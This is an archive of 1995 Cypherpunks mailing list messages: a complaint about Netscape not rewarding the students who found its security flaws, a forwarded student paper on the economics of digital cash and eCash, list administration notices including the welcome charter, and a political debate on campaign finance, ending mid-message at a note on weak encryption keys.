> >> 11 Dec 95 B7)
> >
> >Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000
> >from Netscape for finding the HUGE security flaws in Netscape's existing 
> >product line??
> >
> >I can't remember whether they got anything or not ...
> 
> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!).

Not anything??  That's shameful ... where on earth are the values in 
America, today?  

AT&T and Netscape have jointly made a small fortune distributing this
product, and yet NEITHER company feels that the software engineers who
"voluntarily" made a difference -- a couple of students -- deserve
even a wooden nickel for the ideas which were used.

It's absolutely shameful.  But then, I guess that AT&T and Netscape
have no shame at all.

They just steal "intellectual property" from students, and don't even
pay a token amount.

And people wonder what's wrong with Aemrica?

>   - Ian "There's a reason people talk about `starving grad students'..."
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 20 Dec 1995 01:05:52 +0800
To: cypherpunks@toad.com
Subject: (fwd) Economics of Digital Money.
Message-ID: <v02120d03acfc6117eabd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Tue, 19 Dec 1995 12:42:23 +0700 (GMT+0700)
From: Patiwat Panurach <pati@ipied.tu.ac.th>
To: ecash@digicash.com
Subject: Economics of Digital Money.
MIME-Version: 1.0
Sender: owner-ecash@digicash.com
Precedence: bulk
Reply-To: ecash@digicash.com

        The Economics of Digital Commerce: An analysis of
        Digital Cash, ElectronicFund Transfers, and eCash

By: Patiwat Panurach
Faculty of Economics
Thammasat University
Bangkok, Thailand


The extraordinary growth of international interconnected computer networks
and the pervasive trend of commerce to utilize these networks as a new field
for there operations has catalyzed the demand for new methods of payments.
These new methods must attain unprecedented levels of security, speed,
privacy, decentralization, and internationalization for digital commerce
to be
accepted by both consumers and entrepreneurs.

This paper seeks to analyze 3 such methods of electronic payments.  First shall
be the generic type of electronic fund transfer that is widely in use.  Second,
the ongoing proposals for an open digital cash standard.  Lastly is a real
world technology currently in implementation called eCash.  These 3 methods
are examined in terms of the dynamics of transaction clearance, the effects on
money supply and the macroeconomy, there classification in terms of money
or cash, and the comparative viewpoints of monetary authorities, financial
institutions, and consumers.  This paper will not attempt to go into detail on
the myriad of encryption systems, protocols, algorithms and other technical
matters concerning the new systems.  These are all secondary aspects of
electronic payment.   As there basis, electronic payment systems are simply
logical evolutionary steps that began  with the realization of the limits of
barter.  The need to pay for  transactions is the root of all electronic
payment
systems.

The first method of electronic payments that shall be examined  has been in use
for a relatively long time.  It is the electronic checking system.  For many,
Electronic Checking and Electronic Payment are the same thing, although
this is not always so.  Electronic Checking simply uses the  existing banking
structure to its fullest potential by eliminating paper checks.  Electronic
Checking is an extremely varied system.  Some examples of it include

... paying for university fees via ATM card
... paying telephone bills via monthly bank account deductions
... large value overseas fund transfers

Conceptually, Electronic Checking, and almost all Electronic Payments,
involves 3 agents1:

1. buyer
2. seller
3. intermediary

The buyer initiates a transaction with the seller and the seller demands
payment.  The buyer then obtains a unique certification of payment (physically
called a check) from the intermediary.  This debits the buyer's account with
the intermediary The buyer then gives the certification to the seller and the
seller gives the certification to the intermediary.  This credits  the seller's
account with the intermediary.

Schematically, this is a conventional checking transaction.  But when it is
conducted electronically, the certification is an electronic  flow that is
documented by the intermediary.  Most important, the  attainment of the
certification, the transfer of the certification, and  the debiting and
crediting of
the accounts occurs instantaneously. If the buyer and seller don't use the same
intermediary, some standardized  clearing house system  between
intermediaries is usually used.

Since electronic checking is essentially checking, it can be analyzed as
checking.  Payments made via electronic checking would be conducted outside
of cash and paper.  Instead of sending a check or paying at a counter, the
buyer would initiate an electronic checking certification.  If this is done
as a
substitute for paying in cash, electronic checking could susbstantually reduce
the transactions demand for money.  In essence, this is not electronic checking
but electronic cash.  But if it is a substitute for conventional checking,
it would
just increase the speed of the transaction.  From the economic standpoint,
there
is no difference in the dynamics of the checking process from normal checks

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 20 Dec 1995 00:30:33 +0800
To: cypherpunks@toad.com
Subject: (fwd) Economics of Digital Money. (part 2)
Message-ID: <v02120d05acfc6169fe0d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Tue, 19 Dec 1995 13:42:20 +0700 (GMT+0700)
From: Patiwat Panurach <pati@ipied.tu.ac.th>
To: ecash@digicash.com
Subject: Economics of Digital Money. (part 2)
MIME-Version: 1.0
Sender: owner-ecash@digicash.com
Precedence: bulk
Reply-To: ecash@digicash.com

        The Economics of Digital Commerce: An analysis of
        Digital Cash, ElectronicFund Transfers, and eCash

(the second part wasn't included for some reason)

The advantages of Electronic Checking over paper checks include

... Savings of time.  The instantaneous updating of account balances allows all
the financial players a greater deal of financial flexibility.  There is no
clearing period for transactions to be finished.  This allows large cost
reductions and more opportunities in cases of large-sum arbitration, and
allows even pedestrian players to have a great deal of financial freedom.
Also considerable is the savings in time.  Checks no longer have to be
cashed  and purchased at bank branches.

... Reduction in paper handling costs2.  Universities are not overwhelmed with
paper  checks at the beginning of each term; banks aren't faced with
unmanageable  lines of people at every payday; governments don't need
large check  printing and mailing facilities; fewer trees are sacrificed.

... No bounced checks.  Being simultaneous, the receiving of the certification
and the debiting and crediting of the accounts assures that no certification
can be made without having funds to back it up.  This  could be done
through an automatic check of account status before the  certification is
issued.  This is similar to the checking of the credit  limit before credit
card transactions are finalized.

... Flexibility.  Electronic checking is an extremely broad and generic
field.  It is used, in some form or the other, worldwide.  Nearly all
types of transactions can be conducted by using electronic checking.

Electronic checking bypasses the physical weaknesses of physical checks.
But it is still, in its essence, a check.  A critical weakness of this is
privacy.  All transactions must pass through the banking system3.
Furthermore, the banking system is obligated to document the details of
every transaction that passes through it.  What is to prevent the bank
from selling or leaking such information to others?  This precludes a
possible infraction of personal civil liberties.  Such was the case of
Winai La-onsuwan, the man who was formally known as the monk Yantra.  His
illicit adventures in an Australian brothel were documented via American
Express receipts4, and such evidence was critical in defrocking him.  An
even more frightening scenario would be if governments would demand access
or control over the electronic checking, or over electronic checking
records.  What would permit them from instantly forbidding, say, a
pregnant woman from buying cigarettes?  Electronic checking systems could
conceivably be a tool of "Big Brother" in gaining control over individual
lives.  As payment systems using electronic checking become more
pervasive, is it necessary sacrifice the privacy and undocumentability of
Cash?

Many feel5 that cash also has a role as an electronic payments system.  Such a
"digital cash" (as it is called by many adherents) would have  to have the
essential characteristics6 of cash from the consumers perspective:

... Anonymity.  The buyer pays the seller.  Nobody, except the seller knows
the  identity of the buyer or the details of the transaction.  In cases were
the buyer uses a sufficiently sophisticated pseudonym system, not even the
seller knows the identity of the buyer.  Besides those of the 2 agents,  there
is no record of the transaction taking place.  The certification of payment is
the payment.  There is no transfer between accounts that banks could
analyze to discern the exact flow of funds.
... Liquidity.  Digital Cash must potentially be accepted by all concerned
economic agents as a method of payments.  For example, in the Global
Internet, the largest meta-network in existence, this would involve a
significant proportion of internet merchants accepting a digital cash, if it is
to be more than an electronic play-money.  In many pilot projects, there
must be a large threshold of affiliated merchants that are willing to
participate in accepting digital payment for the system to be successful.

On the institutional side, digital cash holds many advantages over
existing fiat money (cash).  These mainly involve the physical weaknesses
of cash.  First, Cash is highly risky to robbers.  Cash must be kept in
secure vaults and be guarded by security guards.  The more cash is held,
the greater the potential risk is.  Secondly, cash has high transport
costs.  Because physical mass is proportional with the amount of cash
held, large amounts of cash are difficult to store.  It has been estimated
that money handling costs of transporting cash in the US amount to over 60
billion US$ a year7.  Lastly, the advent of high- quality color copiers
and counterfeiting methods8 make government stores of cash insecure.  It
has been rumored that the United States Government waged economic warfare
against Iraq during the Persian Gulf War by flooding the country with
expertly counterfeited cash9.

Digital Cash could conceivably have many forms.  These might include:

... Prepaid Cards.  Buyers could buy prepaid cards that will be accepted by
special sellers.  For example, phone cards act as surrogates for coins in the
payment of public phones.  The weakness of phone cards as digital cash is
in the liquidity of the medium: no one would accept a 100 Baht phone card
for the payment of a meal.  Electronic road toll payment systems also
suffer from the same weakness.  Recent pilot projects conducted in
Australia by VISA show more promise.  Prepaid and rechargeable cards
are accepted at the point-of-sale  of a variety of merchants.  Furthermore,
to increase the systems acceptability, the cost of point of sale terminals is
subsidized by VISA.  It is now possible to pay for a beer at the bar and a
hotel bill with the same card10.  Proposals for incorporating cash functions
into multipurpose smart cards have been announced by the EMV
(Europay, Mastercard, Visa) consortium11.  This would allow many
functions like SIMM, ATM, encryption/decryption, and digital cash to be
fitted onto a single card.
... Purely Electronic Systems.  Purely electronic digital cash would be devoid
of physical form.  This would make it useful for network and internetwork
transactions where the buyer and seller are physically apart.  The payment
would take place by electronically deduction of digital cash from the buyer
and sending it to the seller.  The actual transfer of digital is usually
encrypted so that only the intended recipient (the seller) could make use of
the cash.  However, methods of anonymity and security must be in place,
as to not turn fully electronic systems into electronic checkings systems.

In all its forms, digital cash is not always cash.  If, say, a financial
institution were to issue the digital cash, the creation of digital cash
could simply be considered a withdrawal from that financial institution.
Similarly, the financial institution would be obliged to credit user
accounts for deposits of digital cash.  The digital cash would not have to
have any real funds to back it, other than any legal reserve limit for the
original deposits.  Digital cash could just be considered as cash on
calculations of money supply.

M1=             1+ Currency/Deposits                     X             MB
           LRR+ (Currency/Deposits) + (Excess reserves/Deposits)

when Currency encapsulates cash, coins, and digital cash.

Withdrawing digital cash reduces the amount of deposits that the financial
institution could use to extend loans, thus reducing any dynamic effects money
creation effects upon M1.

If, on the other hand, a non-financial firm were to issue digital cash, it
would simply be a purchase of 1 unit of digital-cash with 1 unit of
physical-cash.  It could only be backed up by the willingness of merchants
in accepting digital cash as a unit of payments.  This second type of
digital cash is inherently riskier for the consumer than the former.  It
is actually more analogous with coupons than with cash.  Furthermore,
redeeming paper cash for privately issued digital cash does not effect any
transformation upon the monetary conditions of the economy.  Buying this
type of digital cash does not affect the money creation process; there is
no decrease in the economys loan creation capacity.


After considering the conceptual and theoretical aspects of electronic
checking and cash, it is now time to look at a real world example of
electronic payments: eCash is an open standard12 electronic payments
system developed by the Digicash Company and currently the being
implemented by the Mark Twain Bank of Missouri, USA.  Conceptually, eCash
is a type of digital cash, offering high levels of privacy and security.
Its current implementation by the Mark Twain Bank is not exclusive - any
bank licensing Digicashs eCash protocol could become an intermediary in
the eCash scheme.

To undertake transactions13, both buyer and seller would have to have deposits
in the WorldCurrency Access accounts of the Mark Twain Bank.
WorldCurrency Access accounts are claimed to be conventional money
market accounts14; however, they do not pay interest nor have a fixed maturity
period but are insured by the FDIC.  The buyer must instruct the Mark Twain
Bank to transfer funds from his WorldCurrency Access account into his
eCash Mint.  This Mint is a personal buffer account.  Funds in the Mint are
no longer deposits of the bank, and they are not insured.  At any time, the
buyer can order his computer to remotely interface with his Mint and withdraw
funds from the Mint into the buyers hard disk drive on the buyers personal
computer.    The format of the funds is now completely electronic: a series of
zeros and ones that is cryptographically secure and unique.  It might be useful
to consider the funds in the Mint and in the buyers hard disk as being
electronic in an electronic wallet.

To make the payment, the buyer encrypts the appropriate amount of eCash
with a suitably secure encryption protocol15 and sends the eCash to the
seller.  The eCash can be sent to the seller by any data communications
medium, e.g., email, ftp, shttp.  Ironically, eCash can even be saved onto
a disk, and the disk sent to the seller.  Or it can be printed out onto
paper, and the printed copy sent to the seller.  The seller receives the
eCash and after decryptizing it, stores it into his computer.  This can
then be sent to the Mint, and transferred into the sellers WorldCurrency
Access account.  The net result is a decrease in the buyers funds and an
increase in the sellers.

eCash is private: although the Mark Twain Bank will have records for each
eCash withdrawal and deposit16, it is impossible (mathematically
impossible17, not just computationally difficult or improbable) to trace
any subsequent uses of that eCash.  If the users hard disk drive should
crash, the eCash is lost forever18.  But although eCash is purely
electronic, and can easily be copied, it is impossible (again,
mathematically impossible, by the explicit design of the eCash protocol
specification) to use any eCash twice19.

Given its nature, eCash must be considered to be cash from the monetary
standpoint.  eCash withdrawals from the users account are leakages from the
money creation process, in the same way that cash withdrawals are.  If a users
WorldCurrency Access account had $100 in it, and $50 was withdrawn as
eCash, only $50 (minus any legal reserve limit and excess reserve) could be
lent out to others.  Conversely, a $50 eCash deposit would give the Mark
Twain Bank $50 (again, minus any legal reserve limit and excess reserves) to
lend out.

Now let us examine some common tendencies of all types of electronic
payment.  First is the long term trend to increase velocity of money flow
in the economy.  As the growth of the credit card industry (actually a
subset of electronic funds transfer) has shown us, increased convenience
of payment is a large factor in increasing the number of payments made.
As electronic payments become more widespread for the consumer, we might
expect a similar long term trends of increased price level and output
through velocity.  Also, the disembodiment of cash also tends to give
illusions as to its value.  Transforming money from bills in your wallet
into charged electrons in you hard disk is probably a greater
abstractative leap than the transformation from gold coins to fiat
currency.  As another evolutionary step in the development of money, we
might expect consumers to reexamine there conceptions of money, cash, and
value.  Another significant impact has stemmed out of research into the
root of interest gaps in the money market.  Citicorp has claimed that
around 2/5 of the interest charged on a consumer finance loan is in branch
delivery and management costs.  This cost could be reduced substantially
with increased adoption of electronic means of payments.  It has been
estimated that the interest differentials in the money market could be
drastically reduced with adoption.

After examining these three electronic payments systems and there impacts,
it should be noted that no single system is best.  Which system is
adopted depends largely on the needs of the transaction and the agents.
On the consumers side, survey data20 shows that the single most important
factor is wide acceptance of the system.  Thus it may be that any system,
whether it is formally standardized and secured or not, could gain market
dominance and remain in that position by virtue of its ad-hoc standard.
Sellers would use it because most customers use it; customers would use it
because most sellers use it.  The main channel for competition would not
be in price of the system, but in gaining exclusive rights to the point of
sale of a large number of merchants.  This environment would make
electronic payments widely available in a relatively short time span, but
is not exactly conductive to diversity or technological advancement.  This
would be analogous with the entrenched tri- opoly of Visa, Mastercard, and
American Express in the credit card market.

An alternative to this situation might be the wide adoption of an open standard
electronic payment system.  In this case, any intermediary would jointly adopt
an inter-operatable system, whereby the client of  one system could
transparently conduct transactions with any other  seller whos intermediary
uses the same system.  This would be similar to  the openness and competition
in Thailand's ATM system, where the 2 main  ATM consortiums (ATM Pool
and BankNet) support an open system.  The  holder of a Bangkok Bank ATM
card can withdraw money from, say, a Thai  Farmers Bank ATM.

Such an open electronic payment system would have several  advantages over a
proprietary electronic payment system.

... Choice.  Users could be given better choice and services.  Since there
could be several intermediaries vying for the same open market, they
would have to use a policy of differentiation.  Such a structure would bring
about a monopolistic competition type market, the "market" being the
market for open-standard electronic payments.  Hopefully, this
differentiation would be for the benefit of users.

... Policy.  Government policy implementation would be less ambiguous.
Generally, the fewer heterogeneous systems there are to regulate, the more
effective government policy would be on each system.  This is because
each system would need a specific interpretation of the applicable laws.
Since in most nations, the legislative process can't enact new laws with
high speed, the "applicable laws" tend to be arcane and controversial.
Combined with the constrained capacity of the state, this might cause an
ambiguous period of years before systems can be finalized.  The ambiguity
during this period can kill of enthusiasm for new systems, leading confused
agents to return to conventional paper methods of payment.  It could also
lead to market distortions, as misguided governments could give anti-
competition concessions to single firms.
... Simplicity.  Open standard electronic payments systems would provide a
consistency in payments from the users side.  It is a general design
principle in computer-human interaction engineering that consistent
interfaces are synonymous with the efficiency of the system.  Survey data21
has shown that simplicity is the second most important aspect that is looked
for in an electronic payments system.  Thus the consistency of an open
standard would  contribute to its wide adoption.

Despite the advantages of open standard electronic payments systems, it is
also likely that a variety of standards could simultaneously gain market
acceptance.  This would not be through conventional price competition, but
rather by seeking niches in the market.  For example, it is highly likely
that some form of electronic cash system will gain a market niche due to
its strong point of unquestionable privacy.  Besides the easily targetable
markets of "socially deviant" products like pornography (one of the most
popular products of the Global Internet) or weapons design (the users of
which tend to be very paranoid), it would also gain acceptance from users
who are uneasy with the fact that each and every one of there transactions
would be documented by the banking system.  Fear of such information
getting into the hands of the few (or the hands of the state) will most
probably cause users to move to a more private system.  Such concerns for
privacy and fear of powerful corporations have crystallized into the
cypherpunk and cyberpunk movements, small but vocal special interest
groups who are often listened to by governments22.

Other niches might include government subsidized ones for the payment of
various state benefits.  The United States Department of Nutrition has
already implemented an advanced Virtual Food Stamp system in New York
City23.  Groceries with a large portion of low-income customers are
required to install electronic payment systems at the point of sale.
Customers can buy there groceries without using cash, there being an
automatic transfer of funds from their food stamp account to the groceries
account.  This system reduces long lines at government offices, eliminates
the black market in redeeming food stamps for cash, and significantly
reduces the shuffling of paper of all parties.  This system is used by
500,000 people and is favored over the old system by 94% of them.

Like any new technology, it would be impractical to think of the status of
electronic payments as clearly defined.  Although the technology has
existed for decades to implement many systems, they have just begun to
permeate into the everyday consumers lives.  The number of merchants
accepting eCash numbers less than a hundred.  Card based electronic cash
systems have only been implemented in pilot projects in a handful of
cities over the globe.  Never the less, the trends of modern commerce,
driven by the weaknesses of traditional payments systems, point to the
eventual rise of electronic payments.  It is just a matter or time and
spirit.



Footnotes

1       from J. C. Wood and D. S. Smith Electronic Transfer of Government
Benifits Federal Reserve Bulletin V.77 N.4 April 1991

2       D. Gleason as quoted by S. Levy E-Money (That's what I want)
Wired V.2 N.12 as archived in http://www.hotwired.com/wired/2.12/features/
emoney.html on the internet

3       via Regulation E implementing the Electronic Funds Transfer Act of
1979 (15 U.S.C. 1693) as quoted in J. C. Wood and D. S. Smith, op. cit.

4       from the news group soc.culture.thai

5       As can be seen from the atmosphere of various sites on the internet.
Most explicit is the cypherpunks mailing list at cypherpunks@toad.com

6       These characteristics, and the mathematical theories that underpin them
were developed over several years in the cypherpunks mailing list and the
future culture mailing list at futurec@uafsysb.uark.edu

7       S. Levy op. cit.

8       S. Levy op. cit.

9       heard from the future culture mailing list, op. cit.

10      S. Levy The End of Money? Time 6 Nov 1995 P.38-44

11      announced in the cypherpunks mailing list

12      details of the protocol and messaging system were publicized in the
internet at http://www.digicash.com/ecash/protpublish.html

13      described in the eCash/Mark Twain Bank FAQ at
http://www.marktwain.com/digifaq.html and the eCash FAQ at
http://www.digicash.com/ecash/faq.html

14      This is claimed in the eCash/Mark Twain Bank FAQ.  But the same
document also states that WorldCurrency Access accounts do not earn interest
and have no fixed time periods.

15      PGP public key encryption is a highly popular defacto standard due to
its high security and its zero price.

16      This is to conform with conventional banking laws concerning the
documentation of transactions.

17      D. Chaum Showing credentials without identification: transferring
signatures between unconditionally unlikely pseudonyms (Springer-Verlig,
Berlin) p.946-64 (Conference: Advances in Cryptology-AUSCRYPT '90
International Conference on Cryptology. Proceedings, Sydney 8-11 January
1990)

18      Just another incentive to backup data

19      the eCash protocol specification at http://www.digicash.com/ecash/
protpublish.html

20      from the internet money survey conducted by the Management School
at Imperial College.  Archived at
http://www.tu.ac.th/thammasat/pati/money.survey.results

21      See fn. 20

22      The Electronic Frontier Foundation has had close links with the Clinton
Administration.  The Cypherpunks mailing list catalyzed public protest that
eventually brought down the government supported Clipper Chip

23      See J. C. Wood and D. S. Smith, op. cit.



-------------------------------------------------------------------------------
Patiwat Panurach             Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics            -Johann W.Von Goethe
-------------------------------------------------------------------------------

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Interserv Operations <postmaster@interserv.com>
Date: Wed, 20 Dec 1995 00:56:00 +0800
To: lbilling@interserv.com
Subject: Mailbox soft limit exceeded
Message-ID: <199512191618.IAA28242@m1.interserv.com>
MIME-Version: 1.0
Content-Type: text/plain


Your mailbox has exceeded the soft size limit of 8MB.  Mail will continue to be
delivered to your mailbox until it reaches the hard size limit of 15MB.  please
removed unecessary messages from you mailbox.

Additionally, if you're using CompuServe/Spry AirMail you may choose the local
inbox option which will download the mail from your remote inbox to your local
system inbox before allowing you to read it.

PLEASE NOTE: Use of the local inbox option will preclude accessing the 
             downloaded mail messages except from the system on which the
             messages were downloaded.

--

Interserv Network Operations Center		Postmaster@interserv.com
2001 6th Ave. Suite 3025B			noc@interserv.net
Seattle, WA. 95121				CompuServe/Internet Division




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Dec 1995 07:05:18 +0800
To: postmaster@ziff.com
Subject: Please help
Message-ID: <9512191501.AA05363@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Please help.  Somehow, someone signed up the "cypherpunks" mailing
list to your "ZD Net Update" electronic newsletter.  Our mailing list,
with over a thousand members, is for the discussion of cryptography
and technical means of achieving privacy and anonymity in the
emergent digital world.

There is some overlap between your publication and our mailing list,
which is why some well-meaning individual "signed us up."  It's pretty
slight, however, and interested parties can sign up individually.

So, please remove cypherpunks@toad.com from your mailing list.  As
always, if you ahve questions about the propriety of this, you can
follow the internet conventions of writing to postmaster@toad.com
to double-check.

Thanks.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 20 Dec 1995 02:57:02 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Political Cleanup program [NOISE]
In-Reply-To: <199512190442.UAA14637@ix3.ix.netcom.com>
Message-ID: <9512191622.AA13870@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I happen to believe in freedom of speech, especially political speech,
>and if you're not allowed to spend money broadcasting your speech or
>printing your messages, you don't have much freedom of press or speech.

It is very strange the way that "Libertarians" are so able to turn all
rights into property rights. Thus freedom of speech become freedom to have
influence on the politicial process in direct proportion to wealth.

I began work on the web in '92 because I saw its potential as a political tool 
which did not have the bias of wealth. It has the potential to create a new kind 
of political dialogue. When the Web becomes as ubiquitous as the telephone we 
will still see inequalities of power, the homeless and the poor will still be 
underrepresented. But that situation must be judged against our own where the 
political process can be bought and traded as if it were any other form of 
comodity.

It is not simply an issue of money, it is an issue of national security. If a 
foreigner were to control the majority of the media there would be a significant 
threat to the national interest. This threat has been realised in the UK with 
the comming to power of Rupert Murdoch. Fortunately his influence on the US 
political scene has thus far been minor. In his own country he has brought down 
the government more than once.

>And as far as "prevent the political process from being owned by the rich" 
>goes, there have been brief exceptions over the last 5000 years in which
>the less-rich have overthrown the rich, but campaign finance laws have almost
>never kept the rich or the politicians from helping each other out.

In UK politicis the influence of an individual's money is limited to influencing 
one party. Even that is done behind closed doors. The other major parties both 
limit the size of individual contributions to a constituency party to a 
relatively nominal sum. $5000 is a huge sum in UK politics.

>I also don't believe freedom of speech should be limited by national 
>boundaries.

Nor do I. But I only vote in one country. If we take the question outside the US 
it would not on the whole be a good thing if the Prime Minister of Tobago (say) 
were provided with a campaign contribution of $1M by a foreign company with an 
interest in strip mining the entire island. similarly it would be a bad thing if 
Columbian drug lords were to make massive contributions to politicians committed 
to continuing the prohibition on drugs.



		Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Fri, 22 Dec 1995 21:33:14 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <9512221332.AA29343@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks
Succeeded.
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Sat, 23 Dec 1995 19:25:58 +0800
To: cypher@infinity.nus.sg
Subject: Welcome to cypherpunks
Message-ID: <9512221333.AA29359@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks Cypherpunks Mailing List <cypher@infinity.nus.sg>

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.  Also, please realize that 
there will be some cypherpunks messages "in transit" to you at the
time you unsubscribe.  If you get a response that says you are unsubscribed,
but the messages keep coming, wait a day and they should stop.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as is
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Sat, 23 Dec 1995 04:30:20 +0800
To: prz@acm.org
Subject: Weak keys in Diamond Encryption Algorithm fixed.
Message-ID: <Pine.SUN.3.91.951222091711.7092B-100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


*******

There is a class of weak keys in the Diamond Encryption Algorithm.  These are
